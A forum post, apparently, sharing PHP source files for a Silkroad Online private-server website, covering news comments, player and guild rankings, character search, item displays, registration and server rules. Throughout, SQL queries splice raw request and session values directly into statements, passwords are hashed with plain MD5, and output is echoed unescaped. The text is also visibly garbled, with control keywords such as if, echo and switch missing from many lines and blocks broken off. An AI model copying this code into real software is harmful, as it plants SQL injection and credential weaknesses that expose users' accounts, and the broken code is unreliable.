strlen ( $cleanText ) < $core -> aConfig [ 'minNewsCommentLen' ] || strlen ( $cleanText ) > $core -> aConfig [ 'maxNewsCommentLen' ])
"<br/>Your message is too short or too long. It has to be at least <b>" . $core -> aConfig [ 'minNewsCommentLen' ]. "</b>
. strlen ( $cleanText ). "</b> symbols long. Max length is " . $core -> aConfig [ 'maxNewsCommentLen' ]. ".<br/>" ;
misc :: back ();
$datetime = misc :: getDateTime ();
core :: $sql -> exec ( "insert into srcms_newscomments(newsID, author, text, time) values(' $nID ',' $_SESSION [ username ] ', ' $cleanText ', ' $datetime ')" );
"<br/><br/><b>Your comment has been successfully added</b>" ;
misc :: redirect ( "?pg=news&comment= $nID " , 1 );
"<br/><br/>You must be logged in to post comments" ;
"<br/>You can't comment news article that doesn't exist." ;
?>
rank
كود PHP:
<?php
global $core ;
$_GET [ 'type' ])
//Characters Ranking
case( 'char' ):
?>
<!--=== Breadcrumbs ===-->
<?php if(isset( $_GET [ 'name' ]) && security :: isSecureString ( $_GET [ 'name' ], 3 ))
$nCharID = char :: charIDByCharname ( $_GET [ 'name' ]);
$nCharID == 0 )
"There is no character with such nickname<br/>" ;
//main
$szUsername = user :: usernameByCharname ( $_GET [ 'name' ]);
$bCanView = core :: $sql -> getRow ( "select ispublic from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $szUsername ). "'" );
$bCanView == 1 ) //DEBUG >= = =
{
//switch to shd db
core :: $sql -> changeDB ( "shard" );
$hGuild = core :: $sql -> getRow ( "select JobType from _CharTrijob where CharID=' $nCharID '" );
$jobType = char :: jobTypeByID ( $hGuild );
$hData = core :: $sql -> fetchArray ( "select * from _Char where CharID=' $nCharID '" );
strlen ( $hData [ 'NickName16' ]) < 2 ) $hData [ 'NickName16' ] = "<b>None</b>" ;
$ownerStr = null ;
$core -> aConfig [ 'allowShowCharOwner' ] == 1 )
$ownerStr = "<a href='?pg=viewprofile&username= $szUsername ' class='color-red'> $szUsername </a>" ;
#echo $ownerStr;
$nGuildName = guild :: guildNameByID ( $hData [ 'GuildID' ]);
$nCharID = char :: charIDByCharname ( $_GET [ 'name' ]);
core :: $sql -> changeDB ( "log" );
$charstatus = core :: $sql -> exec ( "select top 1 EventID,EventTime from _LogEventChar where CharID = ' $nCharID ' order by EventTime DESC" );
core :: $sql -> numRows ( "select top 1 EventID,EventTime from _LogEventChar where CharID = ' $nCharID ' order by EventTime DESC" ) == 0 )
$StatusIS = "<img src='img/status/offline.gif' /> Offline" ;
$row1 = mssql_fetch_array ( $charstatus ))
$charEvent = $row1 [ 'EventID' ];
$charEvent )
4 :
$StatusIS = "<img src='img/status/online.gif' /> <b class='color-green'>Online</b>" ;
6 :
$StatusIS = "<img src='img/status/offline.gif'/> <b class='color-red'>Offline</b>" ;
$StatusIS = "<img src='img/status/offline.gif'/> <b class='color-red'>Offline</b>" ;
core :: $sql -> changeDB ( "acc" );
//Tiger Girl
$uniquetg = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_CH_TIGERWOMAN' " );
//Cerburus
$uniqueker = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_EU_KERBEROS' " );
//IVY
$uniqueivy = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_AM_IVY' " );
//Uruchi
$uniqueuruchi = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_OA_URUCHI' " );
//Isy
$uniqueisy = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_KK_ISYUTARU' " );
//Lord Yarkan
$uniquelord = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_TK_BONELORD' " );
//Demon
$uniquedemon = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_RM_TAHOMET' " );
//SOSO
$uniquesoso = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_TQ_BLACKSNAKE' " );
$uniquemedusa = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_TQ_WHITESNAKE' " ); /*
?>
<?php echo $hData [ CharName16 ]; ?> </td>
<?php echo $nGuildName ; ?> </td>
<?php echo $jobType ; ?> </td>
<?php echo $hData [ CharName16 ]; ?> '><b class='color-green'><?php echo $hData [ CharName16 ]; ?> </b></a></td>
<?php /*<tr>
?>
<tr>
<?php echo $hData [ CurLevel ]; ?> </td>
<?php /*<tr>
?>
<tr>
<?php echo $hData [ Strength ]; ?> </td>
<?php echo $hData [ Intellect ]; ?> </td>
<?php /*<tr>
?>
<tr>
<?php echo $StatusIS ; ?> </td>
<?php echo $hData [ LastLogout ]; ?> </td>
<?php echo $uniquetg ; ?> </td>
<?php echo $uniqueker ; ?> </td>
<?php echo $uniqueivy ; ?> </td>
<?php echo $uniqueuruchi ; ?> </td>
<?php echo $uniqueisy ; ?> </td>
<?php echo $uniquelord ; ?> </td>
<?php echo $uniquedemon ; ?> </td>
<?php echo $uniquesoso ; ?> </td>
<?php echo $uniquemedusa ; ?> </td>
<?php core :: $sql -> changeDB ( 'acc' );
core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] '" ) == 0 )
"This character has no uniques kills!" ;
?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<?php echo $hData [ CharName16 ]; ?> </b>)</div></td>
<?php $hQuery = core :: $sql -> exec ( "select top 30 * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' order by time desc" );
$row = mssql_fetch_array ( $hQuery ))
$datetime1 = strtotime ( $row [ 'time' ]);
$mssqldate1 = date ( "d-m-y" , $datetime1 );
"<tr>" ;
$UniqueType = $row [ 'MobName' ];
$UniqueType ) {
// Tiger Girl
case "MOB_CH_TIGERWOMAN" :
'<td>Tiger Girl</td><td>' . $mssqldate1 . '</td>' ;
"MOB_CH_TIGERWOMAN_L3" :
'<td>Tiger Girl (Titan)</td><td>' . $mssqldate1 . '</td>' ;
// XXX
case "MOB_OA_URUCHI" :
'<td>Uruchi</td><td>' . $mssqldate1 . '</td>' ;
"MOB_KK_ISYUTARU" :
'<td>Isyutaru</td><td>' . $mssqldate1 . '</td>' ;
"MOB_TK_BONELORD" :
'<td>Lord Yarkan</td><td>' . $mssqldate1 . '</td>' ;
"MOB_EU_KERBEROS" :
'<td>Cerberus</td><td>' . $mssqldate1 . '</td>' ;
"MOB_AM_IVY" :
'<td>Captain Ivy</td><td>' . $mssqldate1 . '</td>' ;
"MOB_RM_TAHOMET" :
'<td>Demon Shaitan</td><td>' . $mssqldate1 . '</td>' ;
"MOB_KK_ISYUTARU_L3" :
'<td>Isyutaru (Titan)</td><td>' . $mssqldate1 . '</td>' ;
"MOB_TK_BONELORD_L3" :
'<td>Lord Yarkan (Titan)</td><td>' . $mssqldate1 . '</td>' ;
"MOB_RM_TAHOMET_L3" :
'<td>Demon Shaitan (Titan)</td><td>' . $mssqldate1 . '</td>' ;
"MOB_EU_KERBEROS_L3" :
'<td>Cerberus (Titan)</td><td>' . $mssqldate1 . '</td>' ;
"MOB_AM_IVY_L3" :
'<td>Captain Ivy (Titan)</td><td>' . $mssqldate1 . '</td>' ;
"MOB_OA_URUCHI_L3" :
'<td>Uruchi (Titan)</td><td>' . $mssqldate1 . '</td>' ;
"MOB_TQ_BLACKSNAKE_L3" :
'<td>SoSo The Hades Viper (Titan)</td><td>' . $mssqldate1 . '</td>' ;
"</tr>" ;
?>
</table>
<?php core :: $sql -> changeDB ( 'shard' );
#misc::back();
} else echo "Owner of account on which this character is created didn't want you to view he's (her) data.<br/>" ;
core :: $sql -> changeDB ( "shard" );
$hQuery = core :: $sql -> exec ( "select top 50 * from _Char where CharName16 not like '%[GM]%' order by CurLevel desc" ); ?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<?php $n = 1 ;
$row = mssql_fetch_array ( $hQuery ))
$szUsername = user :: usernameByCharname ( $row [ 'CharName16' ]);
$bCanView = core :: $sql -> getRow ( "select ispublic from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $szUsername ). "'" );
$bCanView > 0 )
$icon = "" ;
$row [ 'RefObjID' ] < 3000 ) $icon = "<img src='img/Character/race_china.png'>" ;
$icon = "<img src='img/Character/race_euro.png'>" ; ?>
<tr>
<?php echo $n ; ?> </b></td>
<?php echo $icon ; ?> </td>
<?php echo $row [ CharName16 ]; ?> '><b class="color-green"><?php echo $row [ CharName16 ]; ?> </b></a></td>
<?php echo $row [ CurLevel ]; ?> </td>
<?php /*<td align='center'><?php echo $row[RemainSkillPoint];?></td> */ ?>
<td align='center'><?php echo $row [ Strength ]; ?> </td>
<?php echo $row [ Intellect ]; ?> </td>
<?php $n ++;
?>
</table>
<?php }
//Search Character Script.
case( 'search_char' ):
?>
<!--=== Breadcrumbs ===-->
<?php if(!isset( $_POST [ 'searchfor' ]))
?>
<form method='post' class="reg-page">
<?php }
$bExit = false ;
security :: isSecureString ( $_POST [ 'searchfor' ], 3 ))
$bExit = true ; ?>
<span class="alert alert-error">Character name contains forbidden symbols!</span>
<?php }
strlen ( $_POST [ 'searchfor' ]) == 0 )
$bExit = true ; ?>
<span class="alert alert-error">Character name can't be 0 symbols long!</span>
<?php }
strlen ( $_POST [ 'searchfor' ]) > 16 )
$bExit = true ; ?>
<span class="alert alert-error">Character name too long!</span>
<?php }
$bExit )
"<br />" ;
core :: $sql -> changeDB ( 'shard' );
$hQuery = core :: $sql -> exec ( "select top 50 * from _Char where CharName16 like '% $_POST [ searchfor ] %'" );
$nResults = 0 ; ?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<?php while( $row = mssql_fetch_array ( $hQuery ))
?>
<tr>
<?php echo $row [ CharName16 ]; ?> '><b class="color-green"><?php echo $row [ CharName16 ]; ?> </b></a></td>
<?php $nResults ++;
?>
</table>
<?php if( $nResults > 0 )
?>
<br /><div class="pull-left">Found [<b class="color-green"><?php echo $nResults ; ?> </b>] characters!</div><br />
<?php echo misc :: back (); ?> </div><br />
<?php }
'<div class="pull-left"> No characters found </div><br /><br /><br />' ;
#echo "<br /><br />";
?>
</div><!--/row-fluid-->
<?php }
//Search Guild System
case( 'search_guild' ):
?>
<!--=== Breadcrumbs ===-->
<?php core :: $sql -> changeDB ( 'shard' );
$_POST [ 'search_for' ]))
?>
<?php }
$bExit = false ;
security :: isSecureString ( $_POST [ 'search_for' ], 3 ))
$bExit = true ; ?>
<span class="alert alert-error">Guild name contains forbidden symbols !</span>
<?php }
strlen ( $_POST [ 'search_for' ]) == 0 )
$bExit = true ; ?>
<span class="alert alert-error">Guild name length can't be 0</span>
<?php }
strlen ( $_POST [ 'search_for' ]) > 16 )
$bExit = true ; ?>
<span class="alert alert-error">Guild name too long</span>
<?php }
$bExit )
core :: $sql -> changeDB ( 'shard' );
$hQuery = core :: $sql -> exec ( "select top 50 * from _Guild where Name like '% $_POST [ search_for ] %'" );
$nResults = mssql_num_rows ( $hQuery ) > 0 )
?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<?php while( $row = mssql_fetch_array ( $hQuery ))
?>
<tr>
<?php echo $row [ Name ]; ?> '><b class="color-green"><?php echo $row [ Name ]; ?> </b></a></td>
<?php } ?>
</table>
<?php echo $nResults ; ?> </b>]<br />
<?php echo misc :: back (); ?> </div><br />
<?php }
"No results!<br /><br />" ;
#echo "<br /><br />";
?>
</div><!--/row-fluid-->
<?php
}
//Guilds Ranking
case( 'guild' ):
?>
<!--=== Breadcrumbs ===-->
<?php core :: $sql -> changeDB ( 'shard' );
$_GET [ 'name' ]))
$hQuery = core :: $sql -> exec ( "select top 50 * from _Guild where ID > 0 and ID != 24 order by Lvl desc,GatheredSP desc" ); ?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<?php $nGuild = 1 ;
$row = mssql_fetch_array ( $hQuery ))
$nMembers = core :: $sql -> getRow ( "select count(*) from _GuildMember where GuildID=' $row [ ID ] '" ); ?>
<tr>
<?php echo $nGuild ; ?> </b></td>
<?php echo $row [ Name ]; ?> '><b class="color-green"><?php echo $row [ Name ]; ?> </b></a></td>
<?php echo $row [ Lvl ]; ?> </td>
<?php echo $nMembers ; ?> </td>
<?php echo $row [ GatheredSP ]; ?> </td>
<?php $nGuild ++;
?>
</table>
<?php echo misc :: back ();
#misc::back();
}
security :: isSecureString ( $_GET [ 'name' ], 3 ))
core :: $sql -> numRows ( "select * from _Guild where Name=' $_GET [ name ] '" ) == 0 )
"Guild with such name not found." ;
$hGuildData = mssql_fetch_array ( mssql_query ( "select * from _Guild where Name=' $_GET [ name ] '" ));
$hGuildMembers = core :: $sql -> exec ( "select * from _GuildMember where GuildID=' $hGuildData [ ID ] ' order by MemberClass asc,Contribution DESC,GuildWarKill DESC,CharLevel DESC,GP_Donation DESC" );
/*
?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<?php echo $hGuildData [ Name ]; ?> </b></td>
<?php echo $hGuildData [ Lvl ]; ?> </td>
<?php echo $hGuildData [ GatheredSP ]; ?> </td>
<?php echo $hGuildData [ FoundationDate ]; ?> </td>
<?php $n = 1 ;
$row = mssql_fetch_array ( $hGuildMembers ))
$cName = char :: charnameByCharID ( $row [ 'CharID' ]);
$szNickname = "" ;
$nRefObjID = core :: $sql -> getRow ( "select RefObjID from _Char where CharName16=' $cName '" );
$icon = "" ;
$nRefObjID < 3000 ) $icon = "<img src='img/Character/race_china.png'>" ;
$icon = "<img src='img/Character/race_euro.png'>" ;
$memberType = "" ;
$row [ 'MemberClass' ] == 0 ) $memberType = "<font class='color-red'>Master</font>" ;
$memberType = "Member" ;
$row [ 'Nickname' ])) $szNickname = "<font color='blue'>NONE</font>" ;
$szNickname = $row [ 'Nickname' ]; ?>
<tr>
<?php echo $n ; ?> </td>
<?php echo $icon ; ?> </td>
<?php echo $cName ; ?> '><b class="color-green"><?php echo $cName ; ?> </a></td>
<?php echo $szNickname ; ?> </td>
<?php echo $row [ CharLevel ]; ?> </td>
<?php echo $row [ GP_Donation ]; ?> </td>
<?php echo $row [ GuildWarKill ]; ?> </td>
<?php echo $row [ GuildWarKilled ]; ?> </td>
<?php echo $memberType ; ?> </td>
<? $n ++;
"</table>" ;
misc :: back ();
"Invalid guild name." ;
?>
</div><!--/row-fluid-->
<?php
}
//Unique Kills Ranking
case( 'unique' ):
?>
<!--=== Breadcrumbs ===-->
<?php core :: $sql -> changeDB ( 'acc' );
$n = 1 ;
$hQuery = core :: $sql -> exec ( "select top 100 * from Evangelion_uniques order by time desc" ); ?>
<table class="table table-striped" border="0" cellpadding="0" cellspacing="0">
<?php while( $row = mssql_fetch_array ( $hQuery ))
$UniqueType = $row [ 'MobName' ];
$UniqueType ) {
// Tiger Girl
case "MOB_CH_TIGERWOMAN" :
'<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>Tiger Girl</td><td>' . $row [ 'time' ]. '</td></tr>' ;
//Cerberus
case "MOB_EU_KERBEROS" :
'<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>Cerberus</td><td>' . $row [ 'time' ]. '</td></tr>' ;
//Captain Ivy
case "MOB_AM_IVY" :
'<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>Captain Ivy</td><td>' . $row [ 'time' ]. '</td></tr>' ;
//Uruchi
case "MOB_OA_URUCHI" :
'<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>Uruchi</td><td>' . $row [ 'time' ]. '</td></tr>' ;
//Isyutaru
case "MOB_KK_ISYUTARU" :
'<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>Isyutaru</td><td>' . $row [ 'time' ]. '</td></tr>' ;
//Lord Yarkan
case "MOB_TK_BONELORD" :
'<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>Lord Yarkan</td><td>' . $row [ 'time' ]. '</td></tr>' ;
//Demon Shaitan
case "MOB_RM_TAHOMET" :
'<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>Demon Shaitan</td><td>' . $row [ 'time' ]. '</td></tr>' ;
//Medusa
case "MOB_TQ_BLACKSNAKE" :
'<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>SoSo The Black Viper </td><td>' . $row [ 'time' ]. '</td></tr>' ;
//Anything Else will be posted has pk2 name (must be added to those lines if you wanna add a real name.
default:
$n ++;
?>
</table>
<?php
}
// Job Ranking
case( 'job' ):
core :: $sql -> changeDB ( "shard" );
$hQuery = core :: $sql -> exec ( "select top 50 * from _CharTrijob order by Contribution desc, Exp desc, Level desc" ); ?>
<!--=== Breadcrumbs ===-->
<?php $n = 1 ;
$row = mssql_fetch_array ( $hQuery ))
$jobType = char :: jobTypeByID ( $row [ 'JobType' ]);
$charName = char :: charnameByCharID ( $row [ 'CharID' ]); ?>
<tr>
<?php echo $n ; ?> </b></td>
<?php echo $charName ; ?> '><?php echo $charName ; ?> </a></td>
<?php echo $jobType ; ?> </td>
<?php echo $row [ Exp ]; ?> </td>
<?php echo $row [ Contribution ]; ?> </td>
<?php $n ++;
?>
</table>
<?php break;
//Job Ranking - Thiefs Only
case( 'jobthief' ):
core :: $sql -> changeDB ( "shard" );
$hQuery = core :: $sql -> exec ( "select top 50 * from _CharTrijob where JobType = 2 order by Contribution desc, Exp desc, Level desc" ); ?>
<!--=== Breadcrumbs ===-->
<?php $n = 1 ;
$row = mssql_fetch_array ( $hQuery ))
$jobType = char :: jobTypeByID ( $row [ 'JobType' ]);
$charName = char :: charnameByCharID ( $row [ 'CharID' ]); ?>
<tr>
<?php echo $n ; ?> </b></td>
<?php echo $charName ; ?> '>$charName;?></a></td>
<?php echo $jobType ; ?> </td>
<?php echo $row [ Exp ]; ?> </td>
<?php echo $row [ Contribution ]; ?> </td>
<?php $n ++;
?>
</table>
<?php break;
//Job Ranking - Hunters Only
case( 'jobhunter' ):
core :: $sql -> changeDB ( "shard" );
$hQuery = core :: $sql -> exec ( "select top 50 * from _CharTrijob where JobType = 3 order by Contribution desc, Exp desc, Level desc" ); ?>
<!--=== Breadcrumbs ===-->
<?php $n = 1 ;
$row = mssql_fetch_array ( $hQuery ))
$jobType = char :: jobTypeByID ( $row [ 'JobType' ]);
$charName = char :: charnameByCharID ( $row [ 'CharID' ]); ?>
<tr>
<?php echo $n ; ?> </b></td>
<?php echo $charName ; ?> '><?php echo $charName ; ?> </a></td>
<?php echo $jobType ; ?> </td>
<?php echo $row [ Exp ]; ?> </td>
<?php echo $row [ Contribution ]; ?> </td>
<?php $n ++;
?>
</table>
<?php break;
//Job Ranking - Trader Only
case( 'jobtrader' ):
core :: $sql -> changeDB ( "shard" );
$hQuery = core :: $sql -> exec ( "select top 50 * from _CharTrijob where JobType = 1 order by Contribution desc, Exp desc, Level desc" ); ?>
<!--=== Breadcrumbs ===-->
<?php $n = 1 ;
$row = mssql_fetch_array ( $hQuery ))
$jobType = char :: jobTypeByID ( $row [ 'JobType' ]);
$charName = char :: charnameByCharID ( $row [ 'CharID' ]); ?>
<tr>
<?php echo $n ; ?> </b></td>
<?php echo $jobType ; ?> </td>
<?php echo $row [ Exp ]; ?> </td>
<?php echo $row [ Contribution ]; ?> </td>
<?php $n ++;
?>
</table>
<?php break;
//Honor Ranking
case( 'honor' ):
core :: $sql -> changeDB ( "shard" );
$hHonorRank = core :: $sql -> exec ( "select * from _TrainingCampHonorRank where CampID IS NOT NULL order by Ranking ASC" ); ?>
<!--=== Breadcrumbs ===-->
<?php
while( $row = mssql_fetch_array ( $hHonorRank ))
$data = misc :: getCampDataByID ( $row [ 'CampID' ]); ?>
<tr>
<?php echo $row [ Ranking ]; ?> </b></td>
<?php echo $data [ OwnerName ]; ?> '><?php echo $data [ OwnerName ]; ?> </a></td>
<?php echo $data [ GraduateCount ]; ?> </td>
<?php } ?>
<?php }
//We'll be added in future updates.
case( 'set_plus' ):
core :: $sql -> changeDB ( "shard" ); ?>
<!--=== Breadcrumbs ===-->
<?php $query = core :: $sql -> exec ( "
);
$row = mssql_fetch_array ( $query )){ ?>
<?php echo $row [ 'CharName16' ]; ?> "><?php echo $row [ 'CharName16' ]; ?> </a></td>
<?php echo $row [ 'AssocFileIcon128' ]; ?> .png" width="32" height="32" alt=""/></td>
<?php echo $row [ 'EndTextString' ]; ?> </td>
<?php $totalvalue = $row [ 'OptLevel' ]+ $row [ 'nOptValue' ];
$advonly = $row [ 'nOptValue' ];
$itemclass = $row [ 'ItemClass' ];
$itemclass ) {
1 :
'<td>Normal</td>' ;
2 :
'<td>Seal Of Moon</td>' ;
3 :
'<td>Seal Of Sun</td>' ;
4 :
'<td>Normal</td>' ;
5 :
'<td>Seal Of Moon</td>' ;
6 :
'<td>Seal Of Sun</td>' ;
7 :
'<td>Normal</td>' ;
8 :
'<td>Seal Of Star</td>' ;
9 :
'<td>Seal Of Moon</td>' ;
10 :
'<td>Seal Of Sun</td>' ;
11 :
'<td>Normal</td>' ;
12 :
'<td>Seal Of Star</td>' ;
13 :
'<td>Seal Of Moon</td>' ;
14 :
'<td>Seal Of Sun</td>' ;
15 :
'<td>Normal</td>' ;
16 :
'<td>Seal Of Star</td>' ;
17 :
'<td>Seal Of Moon</td>' ;
18 :
'<td>Seal Of Sun</td>' ;
19 :
'<td>Normal</td>' ;
20 :
'<td>Seal Of Star</td>' ;
21 :
'<td>Seal Of Moon</td>' ;
22 :
'<td>Seal Of Sun</td>' ;
23 :
'<td>Normal</td>' ;
24 :
'<td>Seal Of Star</td>' ;
25 :
'<td>Seal Of Moon</td>' ;
26 :
'<td>Seal Of Sun</td>' ;
27 :
'<td>Normal</td>' ;
28 :
'<td>Seal Of Star</td>' ;
29 :
'<td>Seal Of Moon</td>' ;
30 :
'<td>Seal Of Sun</td>' ;
'<td>Normal</td>' ;
'<td align="center">' . $row [ 'ReqLevel1' ]. '</td>' ;
'<td>' . $totalvalue . '' ;
$advonly ) {
"NULL" :
1 :
'+(1) ADV</td>' ;
2 :
'+(2) ADV</td>' ;
'</tr>' ;
?>
</tr>
<?php break;
'set_char' ):
$nCharName = $_GET [ 'name' ];
core :: $sql -> changeDB ( "shard" ); ?>
<!--=== Breadcrumbs ===-->
<?php $query = core :: $sql -> exec ( "
$nCharName ' and inv.Slot between 0 and 12 and inv.Slot != 8
);
$row = mssql_fetch_array ( $query )){
'<tr>' ;
'<td align="center"><a href="?pg=rank&type=char&name=' . $row [ 'CharName16' ]. '">' . $row [ 'CharName16' ]. '</a></td>' ;
$row [ 'AssocFileIcon128' ] == 'xxx' ){
'<td><img src="./item/clean.png" width="32" height="32" alt=""/></td>' ;
'<td><img src="./' . $row [ 'AssocFileIcon128' ]. '.png" width="32" height="32" alt=""/></td>' ;
$row [ 'CodeName128' ] == 'DUMMY_OBJECT' ){
'<td>-</td>' ;
'<td>' . $row [ 'EndTextString' ]. '</td>' ;
$totalvalue = $row [ 'OptLevel' ]+ $row [ 'nOptValue' ];
$advonly = $row [ 'nOptValue' ];
$row [ 'CodeName128' ] == 'ITEM_ETC_AMMO_ARROW_01' || $row [ 'CodeName128' ] == 'ITEM_ETC_AMMO_BOLT_01' || $row [ 'CodeName128' ] == 'DUMMY_OBJECT' ){
'<td>-</td>' ;
$itemclass = $row [ 'ItemClass' ];
$itemclass ) {
27 :
'<td>Normal</td>' ;
28 :
'<td>Seal Of Star</td>' ;
29 :
'<td>Seal Of Moon</td>' ;
30 :
'<td>Seal Of Sun</td>' ;
'<td>Normal</td>' ;
$row [ 'CodeName128' ] == 'ITEM_ETC_AMMO_ARROW_01' || $row [ 'CodeName128' ] == 'ITEM_ETC_AMMO_BOLT_01' || $row [ 'CodeName128' ] == 'DUMMY_OBJECT' ){
'<td>-</td>' ;
'<td>' . $row [ 'ReqLevel1' ]. '</td>' ;
$row [ 'CodeName128' ] == 'ITEM_ETC_AMMO_ARROW_01' || $row [ 'CodeName128' ] == 'ITEM_ETC_AMMO_BOLT_01' || $row [ 'CodeName128' ] == 'DUMMY_OBJECT' ){
'<td>-</td>' ;
'<td>' . $totalvalue . '' ;
$advonly ) {
"NULL" :
1 :
'+(1) ADV</td>' ;
2 :
'+(2) ADV</td>' ;
'</tr>' ;
?>
<?php echo misc :: back (); ?>
</div><!--/row-fluid-->
<?php break;
// Default Page (Without Page Selected) .
default:
//list functions
break;
?>
reg
كود PHP:
<?php
global $core ;
$_GET [ 'ref' ]))
security :: isSecureString ( $_GET [ 'ref' ], 3 ) && $core -> aConfig [ 'allowRefferals' ] == 1 )
$_SESSION [ 'ref' ] = $_GET [ 'ref' ];
$_POST [ 'submit' ]) && $_POST [ 'submit' ] != 'login' )
$errors = array();
strlen ( $_POST [ 'username' ]) > 16 ) $errors [] = "Username too long" ;
strlen ( $_POST [ 'username' ]) < 3 ) $errors [] = "Username too short" ;
strlen ( $_POST [ 'pass1' ]) > 32 ) $errors [] = "Password [1] too long" ;
strlen ( $_POST [ 'pass1' ]) < 6 ) $errors [] = "Password [1] too short" ;
strlen ( $_POST [ 'pass2' ]) > 32 ) $errors [] = "Password [2] too long" ;
strlen ( $_POST [ 'pass2' ]) < 6 ) $errors [] = "Password [2] too short" ;
strlen ( $_POST [ 'email' ]) > 54 ) $errors [] = "Email too long" ;
strlen ( $_POST [ 'email' ]) < 6 ) $errors [] = "Email too short" ;
/******** Answers Sec *********/
if( strlen ( $_POST [ 'sec_question' ]) > 54 ) $errors [] = "Security Question too long" ;
strlen ( $_POST [ 'sec_question' ]) < 3 ) $errors [] = "Security Question too short" ;
strlen ( $_POST [ 'sec_answer' ]) > 54 ) $errors [] = "Security Answer too long" ;
strlen ( $_POST [ 'sec_answer' ]) < 3 ) $errors [] = "Security Answer too short" ;
security :: isSecureString ( $_POST [ 'username' ], 3 )) $errors [] = "Username field contains forbidden symbols" ;
security :: isSecureString ( $_POST [ 'pass1' ], 3 )) $errors [] = "Password [1] field contains forbidden symbols" ;
security :: isSecureString ( $_POST [ 'pass2' ] , 3 )) $errors [] = "Password [2] field contains forbidden symbols" ;
security :: isSecureString ( $_POST [ 'email' ], 2 )) $errors [] = "Email field contains forbidden symbols" ;
security :: isCorrectEmail ( $_POST [ 'email' ])) $errors [] = "Invalid email address" ;
$_POST [ 'pass1' ] != $_POST [ 'pass2' ]) $errors [] = "Password fields dosent match" ;
count ( $errors ) > 0 )
?>
<!--=== Content Part ===-->
<?php for( $i = 0 ; $i < count ( $errors ); $i ++)
?>
<p><?php echo $errors [ $i ]. ".<br/>" ; ?> </p>
<?php } ?>
</form>
<?php }
user :: accountExists ( $_POST [ 'username' ]) == 1 )
?>
<!--=== Content Part ===-->
<?php }
core :: $sql -> exec ( "insert into TB_User(StrUserID,password,reg_ip,sec_content,sec_primary, email) values(' $_POST [ username ] ','" . md5 ( $_POST [ 'pass1' ]). "','" . $_SERVER [ 'REMOTE_ADDR' ]. "','3','3',' $_POST [ email ] ')" );
$nJID = user :: accountJIDbyUsername ( $_POST [ 'username' ]);
$szAvatarDefault = "img/noavatar.png" ;
core :: $sql -> exec ( "insert into srcms_userprofiles(JID,gender,skype,sec_question,sec_answer,avatar,whois, ispublic) values(' $nJID ','0','None',' $_POST [ sec_question ] ',' $_POST [ sec_answer ] ',' $szAvatarDefault ','user','1')" );
core :: $sql -> exec ( "insert into SK_Silk(JID,silk_own,silk_gift,silk_point) values(' $nJID ','" . $core -> aConfig [ 'startSilk' ]. "','0','0')" );
$_SESSION [ 'ref' ]))
$_SESSION [ 'ref' ] == $_SESSION [ 'username' ])
"<br/>You can't be refferer for your own account (but account created).<br/>" ;
$reffererJID = user :: accountJIDbyUsername ( $_SESSION [ 'ref' ]);
$reffererJID > 0 )
$nRefIPs = core :: $sql -> numRows ( "select * from srcms_refferals where IP='" . $_SERVER [ REMOTE_ADDR ]. "'" );
$nRefIPs < $core -> aConfig [ 'maxRefAccIP' ])
$datetime = gmDate ( 'Y-m-d H:i:s' );
core :: $sql -> exec ( "insert into srcms_refferals(reffererJID,invitedUserJID,time,ip) values(' $reffererJID ',' $nJID ',' $datetime ',' $_SERVER [ REMOTE_ADDR ] ')" );
$_SESSION [ 'ref' ]);
$sName = $core -> aConfig [ 'serverName' ];
mail ( $_POST [ 'email' ], "Thanks for registering at $sName " , "Thanks for registering at $sName , we really hope you will have a great fun playing here." , "From: $noreply @ $sName " ); ?>
<?php misc :: redirect ( "?pg=Home" , 5 );
//todo:add ajax validator
?>
<!--=== Content Part ===-->
<?php
}
?>
rules
كود PHP:
< table border = '1' id = 'table-3' cellpadding = '0' cellspacing = '0' >
tr >
td > 1. Botting is allowed ! ( Gold Botting with or without Proxies is forbidden )</ td >
tr >
tr >
